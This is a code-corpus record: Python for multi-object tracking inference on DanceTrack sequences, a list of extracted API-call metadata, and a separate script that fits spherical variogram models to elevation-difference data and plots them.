self.active_trackers[idx] = self.inactive_trackers.pop(idx)
if idx not in self.active_trackers:
# create a new track.
self.active_trackers[idx] = Track(idx)
self.active_trackers[idx].update(bbox)
elif label == 1:
# get an occluded track.
if idx in self.active_trackers:
# set state of track inactive.
self.inactive_trackers[idx] = self.active_trackers.pop(idx)
if idx not in self.inactive_trackers:
# It's strange to obtain a new occluded track.
# TODO: think more rational disposal.
self.inactive_trackers[idx] = Track(idx)
self.inactive_trackers[idx].miss_one_frame()
if self.inactive_trackers[idx].miss > 10:
self._remove_track(idx)
ret = []
for i in range(len(dt_instances)):
label = dt_instances.labels[i]
if label == 0:
id = dt_instances.obj_idxes[i]
box_with_score = np.concatenate([dt_instances.boxes[i], dt_instances.scores[i:i+1]], axis=-1)
ret.append(np.concatenate((box_with_score, [id + 1])).reshape(1, -1)) # +1 as MOT benchmark requires positive
if len(ret) > 0:
return np.concatenate(ret)
return np.empty((0, 6))
def load_label(label_path: str, img_size: tuple) -> dict:
labels0 = np.loadtxt(label_path, dtype=np.float32).reshape(-1, 6)
h, w = img_size
# Normalized cewh to pixel xyxy format
labels = labels0.copy()
labels[:, 2] = w * (labels0[:, 2] - labels0[:, 4] / 2)
labels[:, 3] = h * (labels0[:, 3] - labels0[:, 5] / 2)
labels[:, 4] = w * (labels0[:, 2] + labels0[:, 4] / 2)
labels[:, 5] = h * (labels0[:, 3] + labels0[:, 5] / 2)
targets = {'boxes': [], 'labels': [], 'area': []}
num_boxes = len(labels)
visited_ids = set()
for label in labels[:num_boxes]:
obj_id = label[1]
if obj_id in visited_ids:
continue
visited_ids.add(obj_id)
targets['boxes'].append(label[2:6].tolist())
targets['area'].append(label[4] * label[5])
targets['labels'].append(0)
targets['boxes'] = np.asarray(targets['boxes'])
targets['area'] = np.asarray(targets['area'])
targets['labels'] = np.asarray(targets['labels'])
return targets
def filter_pub_det(res_file, pub_det_file, filter_iou=False):
frame_boxes = {}
with open(pub_det_file, 'r') as f:
lines = f.readlines()
for line in lines:
if len(line) == 0:
continue
elements = line.strip().split(',')
frame_id = int(elements[0])
x1, y1, w, h = elements[2:6]
x1, y1, w, h = float(x1), float(y1), float(w), float(h)
x2 = x1 + w - 1
y2 = y1 + h - 1
if frame_id not in frame_boxes:
frame_boxes[frame_id] = []
frame_boxes[frame_id].append([x1, y1, x2, y2])
for frame, boxes in frame_boxes.items():
frame_boxes[frame] = np.array(boxes)
ids = {}
num_filter_box = 0
with open(res_file, 'r') as f:
lines = f.readlines()
with open(res_file, 'w') as f:
for line in lines:
if len(line) == 0:
continue
elements = line.strip().split(',')
frame_id, obj_id = elements[:2]
frame_id = int(frame_id)
obj_id = int(obj_id)
x1, y1, w, h = elements[2:6]
x1, y1, w, h = float(x1), float(y1), float(w), float(h)
x2 = x1 + w - 1
y2 = y1 + h - 1
if obj_id not in ids:
# track initialization.
if frame_id not in frame_boxes:
num_filter_box += 1
print("filter init box {} {}".format(frame_id, obj_id))
continue
pub_dt_boxes = frame_boxes[frame_id]
dt_box = np.array([[x1, y1, x2, y2]])
if filter_iou:
max_iou = bbox_iou(dt_box, pub_dt_boxes).max()
if max_iou < 0.5:
num_filter_box += 1
print("filter init box {} {}".format(frame_id, obj_id))
continue
else:
pub_dt_centers = (pub_dt_boxes[:, :2] + pub_dt_boxes[:, 2:4]) * 0.5
x_inside = (dt_box[0, 0] <= pub_dt_centers[:, 0]) & (dt_box[0, 2] >= pub_dt_centers[:, 0])
y_inside = (dt_box[0, 1] <= pub_dt_centers[:, 1]) & (dt_box[0, 3] >= pub_dt_centers[:, 1])
center_inside:np.ndarray = x_inside & y_inside
if not center_inside.any():
num_filter_box += 1
print("filter init box {} {}".format(frame_id, obj_id))
continue
print("save init track {} {}".format(frame_id, obj_id))
ids[obj_id] = True
f.write(line)
print("totally {} boxes are filtered.".format(num_filter_box))
class ListImgDataset(Dataset):
def __init__(self, img_list) -> None:
super().__init__()
self.img_list = img_list
'''
common settings
'''
self.img_height = 800
self.img_width = 1536
self.mean = [0.485, 0.456, 0.406]
self.std = [0.229, 0.224, 0.225]
def load_img_from_file(self, f_path):
label_path = f_path.replace('images', 'labels_with_ids').replace('.png', '.txt').replace('.jpg', '.txt')
cur_img = cv2.imread(f_path)
assert cur_img is not None, f_path
cur_img = cv2.cvtColor(cur_img, cv2.COLOR_BGR2RGB)
targets = load_label(label_path, cur_img.shape[:2]) if os.path.exists(label_path) else None
return cur_img, targets
def init_img(self, img):
ori_img = img.copy()
self.seq_h, self.seq_w = img.shape[:2]
scale = self.img_height / min(self.seq_h, self.seq_w)
if max(self.seq_h, self.seq_w) * scale > self.img_width:
scale = self.img_width / max(self.seq_h, self.seq_w)
target_h = int(self.seq_h * scale)
target_w = int(self.seq_w * scale)
img = cv2.resize(img, (target_w, target_h))
img = F.normalize(F.to_tensor(img), self.mean, self.std)
img = img.unsqueeze(0)
return img, ori_img
def __len__(self):
return len(self.img_list)
def __getitem__(self, index):
img, targets = self.load_img_from_file(self.img_list[index])
return self.init_img(img)
class Detector(object):
def __init__(self, args, model=None, seq_num=2):
self.args = args
self.detr = model
self.seq_num = seq_num
img_list = os.listdir(os.path.join(self.args.mot_path, 'DanceTrack/test', self.seq_num, 'img1'))
img_list = [os.path.join(self.args.mot_path, 'DanceTrack/test', self.seq_num, 'img1', _) for _ in img_list if
('jpg' in _) or ('png' in _)]
self.img_list = sorted(img_list)
self.img_len = len(self.img_list)
self.tr_tracker = MOTR()
self.save_path = os.path.join(self.args.output_dir, 'results/{}'.format(seq_num))
os.makedirs(self.save_path, exist_ok=True)
self.predict_path = os.path.join(self.args.output_dir, args.exp_name)
os.makedirs(self.predict_path, exist_ok=True)
if os.path.exists(os.path.join(self.predict_path, f'{self.seq_num}.txt')):
os.remove(os.path.join(self.predict_path, f'{self.seq_num}.txt'))
@staticmethod
def filter_dt_by_score(dt_instances: Instances, prob_threshold: float) -> Instances:
keep = dt_instances.scores > prob_threshold
return dt_instances[keep]
@staticmethod
def filter_dt_by_area(dt_instances: Instances, area_threshold: float) -> Instances:
wh = dt_instances.boxes[:, 2:4] - dt_instances.boxes[:, 0:2]
areas = wh[:, 0] * wh[:, 1]
keep = areas > area_threshold
return dt_instances[keep]
@staticmethod
def write_results(txt_path, frame_id, bbox_xyxy, identities):
save_format = '{frame},{id},{x1},{y1},{w},{h},1,-1,-1,-1\n'
with open(txt_path, 'a') as f:
for xyxy, track_id in zip(bbox_xyxy, identities):
if track_id < 0 or track_id is None:
continue
x1, y1, x2, y2 = xyxy
w, h = x2 - x1, y2 - y1
line = save_format.format(frame=int(frame_id), id=int(track_id), x1=x1, y1=y1, w=w, h=h)
f.write(line)
def eval_seq(self):
data_root = os.path.join(self.args.mot_path, 'MOT15/images/train')
result_filename = os.path.join(self.predict_path, 'gt.txt')
evaluator = Evaluator(data_root, self.seq_num)
accs = evaluator.eval_file(result_filename)
return accs
@staticmethod
def visualize_img_with_bbox(img_path, img, dt_instances: Instances, ref_pts=None, gt_boxes=None):
if dt_instances.has('scores'):
img_show = draw_bboxes(img, np.concatenate([dt_instances.boxes, dt_instances.scores.reshape(-1, 1)], axis=-1), dt_instances.obj_idxes)
else:
img_show = draw_bboxes(img, dt_instances.boxes, dt_instances.obj_idxes)
if ref_pts is not None:
img_show = draw_points(img_show, ref_pts)
if gt_boxes is not None:
img_show = draw_bboxes(img_show, gt_boxes, identities=np.ones((len(gt_boxes), )) * -1)
cv2.imwrite(img_path, img_show)
def detect(self, prob_threshold=0.7, area_threshold=100, vis=False):
last_dt_embedding = None
total_dts = 0
total_occlusion_dts = 0
track_instances = None
loader = DataLoader(ListImgDataset(self.img_list), 1, num_workers=2)
with open(os.path.join(self.predict_path, 'gt.txt'), 'w'):
pass
for i, (cur_img, ori_img) in enumerate(tqdm(loader)):
cur_img, ori_img = cur_img[0], ori_img[0]
# track_instances = None
if track_instances is not None:
track_instances.remove('boxes')
track_instances.remove('labels')
seq_h, seq_w, _ = ori_img.shape
res = self.detr.inference_single_image(cur_img.cuda().float(), (seq_h, seq_w), track_instances)
track_instances = res['track_instances']
all_ref_pts = tensor_to_numpy(res['ref_pts'][0, :, :2])
dt_instances = track_instances.to(torch.device('cpu'))
# filter det instances by score.
dt_instances = self.filter_dt_by_score(dt_instances, prob_threshold)
dt_instances = self.filter_dt_by_area(dt_instances, area_threshold)
total_dts += len(dt_instances)
if vis:
# for visual
cur_vis_img_path = os.path.join(self.save_path, 'frame_{}.jpg'.format(i))
gt_boxes = None
self.visualize_img_with_bbox(cur_vis_img_path, ori_img, dt_instances, ref_pts=all_ref_pts, gt_boxes=gt_boxes)
tracker_outputs = self.tr_tracker.update(dt_instances)
self.write_results(txt_path=os.path.join(self.predict_path, f'{self.seq_num}.txt'),
frame_id=(i + 1),
bbox_xyxy=tracker_outputs[:, :4],
identities=tracker_outputs[:, 5])
print("totally {} dts {} occlusion dts".format(total_dts, total_occlusion_dts))
if __name__ == '__main__':
parser = argparse.ArgumentParser('DETR training and evaluation script', parents=[get_args_parser()])
args = parser.parse_args()
if args.output_dir:
Path(args.output_dir).mkdir(parents=True, exist_ok=True)
# load model and weights
detr, _, _ = build_model(args)
checkpoint = torch.load(args.resume, map_location='cpu')
detr = load_model(detr, args.resume)
detr.eval()
detr = detr.cuda()
# '''for MOT17 submit'''
sub_dir = 'DanceTrack/test'
seq_nums = os.listdir(os.path.join(args.mot_path, sub_dir))
for seq_num in seq_nums:
det = Detector(args, model=detr, seq_num=seq_num)
det.detect()
|
[
"numpy.random.seed",
"torchvision.transforms.functional.to_tensor",
"numpy.empty",
"pathlib.Path",
"cv2.rectangle",
"torch.device",
"os.path.join",
"random.randint",
"cv2.cvtColor",
"cv2.imwrite",
"torch.load",
"os.path.exists",
"numpy.loadtxt",
"util.tool.load_model",
"models.build_model",
"util.evaluation.Evaluator",
"cv2.resize",
"tqdm.tqdm",
"numpy.asarray",
"numpy.concatenate",
"cv2.putText",
"os.makedirs",
"main.get_args_parser",
"cv2.getTextSize",
"cv2.imread",
"numpy.array"
] |
[((1980, 2000), 'numpy.random.seed', 'np.random.seed', (['(2020)'], {}), '(2020)\n', (1994, 2000), True, 'import numpy as np\n'), ((3804, 3851), 'cv2.rectangle', 'cv2.rectangle', (['img', 'c1', 'c2', 'color'], {'thickness': 'tl'}), '(img, c1, c2, color, thickness=tl)\n', (3817, 3851), False, 'import cv2\n'), ((10835, 10863), 'numpy.asarray', 'np.asarray', (["targets['boxes']"], {}), "(targets['boxes'])\n", (10845, 10863), True, 'import numpy as np\n'), ((10886, 10913), 'numpy.asarray', 'np.asarray', (["targets['area']"], {}), "(targets['area'])\n", (10896, 10913), True, 'import numpy as np\n'), ((10938, 10967), 'numpy.asarray', 'np.asarray', (["targets['labels']"], {}), "(targets['labels'])\n", (10948, 10967), True, 'import numpy as np\n'), ((20491, 20508), 'models.build_model', 'build_model', (['args'], {}), '(args)\n', (20502, 20508), False, 'from models import build_model\n'), ((20526, 20569), 'torch.load', 'torch.load', (['args.resume'], {'map_location': '"""cpu"""'}), "(args.resume, map_location='cpu')\n", (20536, 20569), False, 'import torch\n'), ((20581, 20610), 'util.tool.load_model', 'load_model', (['detr', 'args.resume'], {}), '(detr, args.resume)\n', (20591, 20610), False, 'from util.tool import load_model\n'), ((4052, 4089), 'cv2.rectangle', 'cv2.rectangle', (['img', 'c1', 'c2', 'color', '(-1)'], {}), '(img, c1, c2, color, -1)\n', (4065, 4089), False, 'import cv2\n'), ((4108, 4219), 'cv2.putText', 'cv2.putText', (['img', 'label', '(c1[0], c1[1] - 2)', '(0)', '(tl / 3)', '[225, 255, 255]'], {'thickness': 'tf', 'lineType': 'cv2.LINE_AA'}), '(img, label, (c1[0], c1[1] - 2), 0, tl / 3, [225, 255, 255],\n thickness=tf, lineType=cv2.LINE_AA)\n', (4119, 4219), False, 'import cv2\n'), ((9940, 9956), 'numpy.empty', 'np.empty', (['(0, 6)'], {}), '((0, 6))\n', (9948, 9956), True, 'import numpy as np\n'), ((11697, 11712), 'numpy.array', 'np.array', (['boxes'], {}), '(boxes)\n', (11705, 11712), True, 'import numpy as np\n'), ((14231, 14249), 'cv2.imread', 'cv2.imread', (['f_path'], {}), '(f_path)\n', (14241, 14249), False, 'import cv2\n'), ((14311, 14351), 'cv2.cvtColor', 'cv2.cvtColor', (['cur_img', 'cv2.COLOR_BGR2RGB'], {}), '(cur_img, cv2.COLOR_BGR2RGB)\n', (14323, 14351), False, 'import cv2\n'), ((14882, 14919), 'cv2.resize', 'cv2.resize', (['img', '(target_w, target_h)'], {}), '(img, (target_w, target_h))\n', (14892, 14919), False, 'import cv2\n'), ((15896, 15938), 'os.makedirs', 'os.makedirs', (['self.save_path'], {'exist_ok': '(True)'}), '(self.save_path, exist_ok=True)\n', (15907, 15938), False, 'import os\n'), ((15968, 16017), 'os.path.join', 'os.path.join', (['self.args.output_dir', 'args.exp_name'], {}), '(self.args.output_dir, args.exp_name)\n', (15980, 16017), False, 'import os\n'), ((16026, 16071), 'os.makedirs', 'os.makedirs', (['self.predict_path'], {'exist_ok': '(True)'}), '(self.predict_path, exist_ok=True)\n', (16037, 16071), False, 'import os\n'), ((17305, 17359), 'os.path.join', 'os.path.join', (['self.args.mot_path', '"""MOT15/images/train"""'], {}), "(self.args.mot_path, 'MOT15/images/train')\n", (17317, 17359), False, 'import os\n'), ((17386, 17427), 'os.path.join', 'os.path.join', (['self.predict_path', '"""gt.txt"""'], {}), "(self.predict_path, 'gt.txt')\n", (17398, 17427), False, 'import os\n'), ((17448, 17482), 'util.evaluation.Evaluator', 'Evaluator', (['data_root', 'self.seq_num'], {}), '(data_root, self.seq_num)\n', (17457, 17482), False, 'from util.evaluation import Evaluator\n'), ((18186, 18217), 'cv2.imwrite', 'cv2.imwrite', (['img_path', 'img_show'], {}), '(img_path, img_show)\n', (18197, 18217), False, 'import cv2\n'), ((20739, 20775), 'os.path.join', 'os.path.join', (['args.mot_path', 'sub_dir'], {}), '(args.mot_path, sub_dir)\n', (20751, 20775), False, 'import os\n'), ((3698, 3720), 'random.randint', 'random.randint', (['(0)', '(255)'], {}), '(0, 255)\n', (3712, 3720), False, 'import random\n'), ((3929, 3986), 'cv2.getTextSize', 'cv2.getTextSize', (['label', '(0)'], {'fontScale': '(tl / 3)', 'thickness': 'tf'}), '(label, 0, fontScale=tl / 3, thickness=tf)\n', (3944, 3986), False, 'import cv2\n'), ((4358, 4470), 'cv2.putText', 'cv2.putText', (['img', 'score', '(c1[0], c1[1] + 30)', '(0)', '(tl / 3)', '[225, 255, 255]'], {'thickness': 'tf', 'lineType': 'cv2.LINE_AA'}), '(img, score, (c1[0], c1[1] + 30), 0, tl / 3, [225, 255, 255],\n thickness=tf, lineType=cv2.LINE_AA)\n', (4369, 4470), False, 'import cv2\n'), ((4648, 4667), 'numpy.asarray', 'np.asarray', (['ori_img'], {}), '(ori_img)\n', (4658, 4667), True, 'import numpy as np\n'), ((8219, 8297), 'numpy.concatenate', 'np.concatenate', (['[dt_instances.boxes[i], dt_instances.scores[i:i + 1]]'], {'axis': '(-1)'}), '([dt_instances.boxes[i], dt_instances.scores[i:i + 1]], axis=-1)\n', (8233, 8297), True, 'import numpy as np\n'), ((9905, 9924), 'numpy.concatenate', 'np.concatenate', (['ret'], {}), '(ret)\n', (9919, 9924), True, 'import numpy as np\n'), ((10031, 10071), 'numpy.loadtxt', 'np.loadtxt', (['label_path'], {'dtype': 'np.float32'}), '(label_path, dtype=np.float32)\n', (10041, 10071), True, 'import numpy as np\n'), ((14415, 14441), 'os.path.exists', 'os.path.exists', (['label_path'], {}), '(label_path)\n', (14429, 14441), False, 'import os\n'), ((14946, 14962), 'torchvision.transforms.functional.to_tensor', 'F.to_tensor', (['img'], {}), '(img)\n', (14957, 14962), True, 'import torchvision.transforms.functional as F\n'), ((15437, 15510), 'os.path.join', 'os.path.join', (['self.args.mot_path', '"""DanceTrack/test"""', 'self.seq_num', '"""img1"""'], {}), "(self.args.mot_path, 'DanceTrack/test', self.seq_num, 'img1')\n", (15449, 15510), False, 'import os\n'), ((15532, 15608), 'os.path.join', 'os.path.join', (['self.args.mot_path', '"""DanceTrack/test"""', 'self.seq_num', '"""img1"""', '_'], {}), "(self.args.mot_path, 'DanceTrack/test', self.seq_num, 'img1', _)\n", (15544, 15608), False, 'import os\n'), ((16098, 16152), 'os.path.join', 'os.path.join', (['self.predict_path', 'f"""{self.seq_num}.txt"""'], {}), "(self.predict_path, f'{self.seq_num}.txt')\n", (16110, 16152), False, 'import os\n'), ((18619, 18631), 'tqdm.tqdm', 'tqdm', (['loader'], {}), '(loader)\n', (18623, 18631), False, 'from tqdm import tqdm\n'), ((9656, 9734), 'numpy.concatenate', 'np.concatenate', (['[dt_instances.boxes[i], dt_instances.scores[i:i + 1]]'], {'axis': '(-1)'}), '([dt_instances.boxes[i], dt_instances.scores[i:i + 1]], axis=-1)\n', (9670, 9734), True, 'import numpy as np\n'), ((12604, 12632), 'numpy.array', 'np.array', (['[[x1, y1, x2, y2]]'], {}), '([[x1, y1, x2, y2]])\n', (12612, 12632), True, 'import numpy as np\n'), ((16177, 16231), 'os.path.join', 'os.path.join', (['self.predict_path', 'f"""{self.seq_num}.txt"""'], {}), "(self.predict_path, f'{self.seq_num}.txt')\n", (16189, 16231), False, 'import os\n'), ((18506, 18547), 'os.path.join', 'os.path.join', (['self.predict_path', '"""gt.txt"""'], {}), "(self.predict_path, 'gt.txt')\n", (18518, 18547), False, 'import os\n'), ((19188, 19207), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (19200, 19207), False, 'import torch\n'), ((20304, 20321), 'main.get_args_parser', 'get_args_parser', ([], {}), '()\n', (20319, 20321), False, 'from main import get_args_parser\n'), ((20387, 20408), 'pathlib.Path', 'Path', (['args.output_dir'], {}), '(args.output_dir)\n', (20391, 20408), False, 'from pathlib import Path\n'), ((19866, 19920), 'os.path.join', 'os.path.join', (['self.predict_path', 'f"""{self.seq_num}.txt"""'], {}), "(self.predict_path, f'{self.seq_num}.txt')\n", (19878, 19920), False, 'import os\n'), ((9760, 9802), 'numpy.concatenate', 'np.concatenate', (['(box_with_score, [id + 1])'], {}), '((box_with_score, [id + 1]))\n', (9774, 9802), True, 'import numpy as np\n')]
|
import os, sys
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import scipy.optimize
from pyddem.volint_tools import neff_circ, std_err
import functools
import matplotlib.ticker as mtick
from mpl_toolkits.axes_grid.inset_locator import inset_axes
plt.rcParams.update({'font.size': 5})
plt.rcParams.update({'lines.linewidth':0.35})
plt.rcParams.update({'axes.linewidth':0.35})
plt.rcParams.update({'lines.markersize':2.5})
plt.rcParams.update({'axes.labelpad':1.5})
all_csv = '/home/atom/ongoing/work_worldwide/validation/tcorr/tinterp_corr_deseas_agg_all.csv'
# all_csv = '/home/atom/ongoing/work_worldwide/validation/tinterp_corr_agg_all.csv'
df = pd.read_csv(all_csv)
# df = df[df.reg==5]
cutoffs = list(set(list(df.cutoff)))
dts = sorted(list(set(list(df.nb_dt))))
col = ['tab:orange','tab:blue','tab:olive','tab:red','tab:cyan','tab:brown','tab:gray','tab:pink','tab:purple']
#plot covar by lag
# for dt in dts:
#
# df_dt = df[df.nb_dt == dt]
#
# for cutoff in cutoffs:
# df_c = df_dt[df_dt.cutoff == cutoff]
#
# if cutoff == 10000:
# plt.scatter(df_c.bins.values[1],df_c.exp.values[1],color=col[dts.index(dt)],label=str(dt))
# plt.scatter(df_c.bins.values[20],df_c.exp.values[20],color=col[dts.index(dt)])
# plt.scatter(df_c.bins.values[50],df_c.exp.values[50],color=col[dts.index(dt)])
# elif cutoff == 100000:
# plt.scatter(df_c.bins.values[20],df_c.exp.values[20],color=col[dts.index(dt)])
# plt.scatter(df_c.bins.values[50],df_c.exp.values[50],color=col[dts.index(dt)])
# else:
# plt.scatter(df_c.bins.values[20],df_c.exp.values[20],color=col[dts.index(dt)])
# plt.scatter(df_c.bins.values[50],df_c.exp.values[50],color=col[dts.index(dt)])
#
# plt.ylim([0,50])
# plt.xscale('log')
# plt.legend()
#plot covar by dt
dts = sorted(dts)
dts.remove(540.)
dts.remove(900.)
dts.remove(1750.)
dts.remove(2250.)
arr_res = np.zeros((len(dts),7))
arr_count = np.zeros((len(dts),7))
for dt in dts:
df_dt = df[df.nb_dt == dt]
for cutoff in cutoffs:
df_c = df_dt[df_dt.cutoff == cutoff]
if cutoff == 10000:
arr_res[dts.index(dt),0]=np.nanmean(df_c.exp.values[1:2])
arr_count[dts.index(dt),0]=np.nanmean(df_c['count'].values[1:2])
arr_res[dts.index(dt), 1] = np.nanmean(df_c.exp.values[20 - 10:20 + 10])
arr_count[dts.index(dt), 1] = np.nanmean(df_c['count'].values[20 - 10:20 + 10])
arr_res[dts.index(dt), 2] = np.nanmean(df_c.exp.values[50 - 10:50 + 10])
arr_count[dts.index(dt), 2] = np.nanmean(df_c['count'].values[50 - 10:50 + 10])
elif cutoff == 100000:
arr_res[dts.index(dt),3]=np.nanmean(df_c.exp.values[20-5:20+20])
arr_count[dts.index(dt),3]=np.nanmean(df_c['count'].values[20-10:20+10])
arr_res[dts.index(dt),4]=np.nanmean(df_c.exp.values[50-10:50+10])
arr_count[dts.index(dt),4]=np.nanmean(df_c['count'].values[50-10:50+10])
elif cutoff == 1000000:
arr_res[dts.index(dt),5]=np.nanmean(df_c.exp.values[20-10:20+30])
arr_count[dts.index(dt),5]=np.nanmean(df_c['count'].values[20-10:20+30])
arr_res[dts.index(dt),6]=np.nanmean(df_c.exp.values[50-40:50+40])
arr_count[dts.index(dt),6]=np.nanmean(df_c['count'].values[50-40:50+40])
arr_res[arr_count<100]=np.nan
# for dt in dts:
#
# df_dt = df[df.nb_dt == dt]
#
# for cutoff in cutoffs:
# df_c = df_dt[df_dt.cutoff == cutoff]
#
# if cutoff == 10000:
# plt.scatter(dt,df_c.exp.values[1],color=col[0])
# plt.scatter(dt,np.nanmean(df_c.exp.values[20-10:20+10]),color=col[1])
# plt.scatter(dt,np.nanmean(df_c.exp.values[50-10:50+10]),color=col[2])
# elif cutoff == 100000:
# plt.scatter(dt,np.nanmean(df_c.exp.values[20-10:20+10]),color=col[3])
# plt.scatter(dt,np.nanmean(df_c.exp.values[50-10:50+10]),color=col[4])
# else:
# plt.scatter(dt,np.nanmean(df_c.exp.values[20-10:20+10]),color=col[5])
# plt.scatter(dt,np.nanmean(df_c.exp.values[50-10:50+10]),color=col[6])
fig = plt.figure(figsize=(7.2,9.3))
# plt.subplots_adjust(hspace=0.3)
grid = plt.GridSpec(8, 13, wspace=0.05, hspace=0.5)
ax = fig.add_subplot(grid[:2,:2])
# ax = fig.add_subplot(2, 1, 1)
vario = df[df.nb_dt == 720.]
vec_bins = []
vec_exp = []
vgm1 = vario[vario.cutoff == 10000]
vgm1 = vgm1[vgm1.bins<3000]
for i in range(6):
vec_bins += [np.nanmean(vgm1.bins.values[0+i*5:5+i*5])]
vec_exp += [np.nanmean(vgm1.exp.values[0+i*5:5+i*5])]
# vec_bins += vgm1.bins.tolist()
# vec_exp += vgm1.exp.tolist()
vgm1 = vario[vario.cutoff == 100000]
vgm1 = vgm1[np.logical_and(vgm1.bins>3000,vgm1.bins<30000)]
vec_bins += vgm1.bins.tolist()
vec_exp += vgm1.exp.tolist()
vgm1 = vario[vario.cutoff == 1000000]
vgm1 = vgm1[vgm1.bins>30000]
for i in range(18):
vec_bins += [np.nanmean(vgm1.bins.values[0+i*5:5+i*5])]
vec_exp += [np.nanmean(vgm1.exp.values[0+i*5:5+i*5])]
vec_bins = np.array(vec_bins)
vec_exp=np.array(vec_exp)
def sph_var(c0,c1,a1,h):
if h < a1:
vgm = c0 + c1 * (3 / 2 * h / a1-1 / 2 * (h / a1) ** 3)
else:
vgm = c0 + c1
return vgm
vect = np.array(list(np.arange(0,3000,1)) + list(np.arange(3000,30000,10)) + list(np.arange(30000,3000000,100)))
mod = []
c1s = [0] + list(arr_res[dts.index(720.),:])
a1s = [0.2,2,5,20,50,200]
#find unbiased sills
list_c = []
for j in range(len(a1s)):
print('Range:' + str(a1s[-1 - j]))
c = c1s[-2 - j] - c1s[-3 - j]
print(c)
for k in range(j):
# c -= sph_var(0, list_c[k], a1s[-1 - k] * 1000, a1s[-1 - j] * 1000)
if j>5:
c -= (sph_var(0, list_c[k], a1s[-1 - k] * 1000, a1s[-1 - j] * 1000) - sph_var(0,list_c[k], a1s[-1-k]*1000,a1s[-2-j]*1000))
elif j==5:
c -= sph_var(0, list_c[k], a1s[-1 - k] * 1000, a1s[-1 - j] * 1000)
c = max(0, c)
list_c.append(c)
list_c.reverse()
#compute variogram
for i in range(len(vect)):
val = 0
for j in range(len(a1s)):
val += sph_var(0,list_c[j],a1s[j]*1000,vect[i])
mod.append(val)
mod = np.array(mod)
ax.scatter(vec_bins/1000,vec_exp,color='black',marker='x')
ax.set_xlim((0,3))
ax.set_ylim((0,50))
ax.set_xticks([0,1,2])
ax.text(0.075, 0.975, 'a', transform=ax.transAxes,
fontsize=8, fontweight='bold', va='top', ha='left')
ax.vlines(0.15,0,60,color=col[0],linewidth=0.5)
ax.text(0.4,c1s[1]-5,'$s_0$',color=col[0],ha='left',va='bottom',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35))
ax.vlines(2,0,60,color=col[1],linewidth=0.5)
ax.text(2.2,c1s[2]-5,'$s_1$',color=col[1],ha='left',va='bottom',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35))
ax.plot(vect/1000,mod,color='dimgrey',linestyle='dashed')
# ax.hlines(25,0,500,colors='black',linestyles='dotted')
ax.set_ylabel('Variance of elevation differences (m$^2$)')
ax.tick_params(width=0.35,length=2.5)
ax = fig.add_subplot(grid[:2,2:4])
ax.scatter(vec_bins/1000,vec_exp,color='black',marker='x')
ax.set_xlim((0,30))
ax.set_ylim((0,50))
ax.set_xticks([0,10,20])
# ax.text(0.075, 0.975, 'B', transform=ax.transAxes,
# fontsize=14, fontweight='bold', va='top', ha='left')
ax.vlines(5,0,60,color=col[2],linewidth=0.5)
ax.text(6,c1s[3]-5,'$s_2$',color=col[2],ha='left',va='bottom',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35))
ax.vlines(20,0,60,color=col[3],linewidth=0.5)
ax.text(21,c1s[4]-5,'$s_3$',color=col[3],ha='left',va='bottom',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35))
ax.plot(vect/1000,mod,color='dimgrey',linestyle='dashed')
# ax.hlines(25,0,500,colors='black',linestyles='dotted',label='Global mean variance')
ax.set_yticks([])
ax.set_xlabel('Spatial lag (km)')
ax.tick_params(width=0.35,length=2.5)
ax = fig.add_subplot(grid[:2,4:6])
ax.scatter(vec_bins/1000,vec_exp,color='black',marker='x')
ax.set_xlim((0,550))
ax.set_ylim((0,50))
ax.set_xticks([0,100,200,300,400,500])
# ax.text(0.075, 0.975, 'C', transform=ax.transAxes,
# fontsize=14, fontweight='bold', va='top', ha='left')
ax.vlines(50,0,60,colors=[col[4]],linewidth=0.5)
ax.text(70,c1s[5]-5,'$s_4$',color=col[4],ha='left',va='bottom',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35))
ax.vlines(200,0,60,colors=[col[5]],linewidth=0.5)
ax.text(220,c1s[6]-7,'$s_5$',color=col[5],ha='left',va='bottom',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35))
ax.vlines(500,0,60,colors=[col[6]],linewidth=0.5)
ax.text(480,c1s[6]-7,'$s_6$',color=col[6],ha='right',va='bottom',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35))
ax.plot(vect/1000,mod,color='dimgrey',linestyle='dashed')
# ax.hlines(25,0,500,colors='black',linestyles='dotted')
ax.tick_params(width=0.35,length=2.5)
ax.plot([],[],color='grey',linestyle='dashed',label='Sum of spherical models')
ax.scatter([],[],color='black',marker='x',label='Empirical variance')
ax.vlines([],[],[],color=col[0],label='0.15 km',linewidth=0.5)
ax.vlines([],[],[],color=col[1],label='2 km',linewidth=0.5)
ax.vlines([],[],[],color=col[2],label='5 km',linewidth=0.5)
ax.vlines([],[],[],color=col[3],label='20 km',linewidth=0.5)
ax.vlines([],[],[],color=col[4],label='50 km',linewidth=0.5)
ax.vlines([],[],[],color=col[5],label='200 km',linewidth=0.5)
ax.vlines([],[],[],color=col[6],label='500 km',linewidth=0.5)
ax.legend(loc='lower right',ncol=3,title='Spatial correlations of GP elevation at $\Delta t$ = 720 days',title_fontsize=6,columnspacing=0.5)
ax.set_yticks([])
ax = fig.add_subplot(grid[2:4,:6])
coefs_list = []
y = None
# arr_res[0:1,4]=25
# arr_res[arr_res>25] = 25.
# arr_res[4,2]=np.nan
# arr_res[3:,3]=np.nan
# arr_res[0,3]=25.
# arr_res[0,3:] = np.nan
for i in [0,1,2,3,4,5,6]:
# i=0
# arr_res[-1,0]=np.nan
coefs , _ = scipy.optimize.curve_fit(lambda t,a,b:a*t+b, np.array(dts)[~np.isnan(arr_res[:,i])], np.sqrt(arr_res[:,i][~np.isnan(arr_res[:,i])]))
coefs_list.append(coefs)
x = np.arange(0, 3000, 1)
if y is not None:
y0 = y
else:
y0 = x*0
y = coefs[0]*x+coefs[1] #- 2*np.sin(x/365.2224*np.pi)**2
# y[y>25]=25.
# y[y<y0]=y0[y<y0]
y = y
ax.plot(x,y**2 -2*np.sin(x/365.2224*2*np.pi)**2,color=col[i])
ax.fill_between(x,y0**2 -2*np.sin(x/365.2224*2*np.pi)**2,y**2 -2*np.sin(x/365.2224*2*np.pi)**2,color = col[i],alpha=0.2)
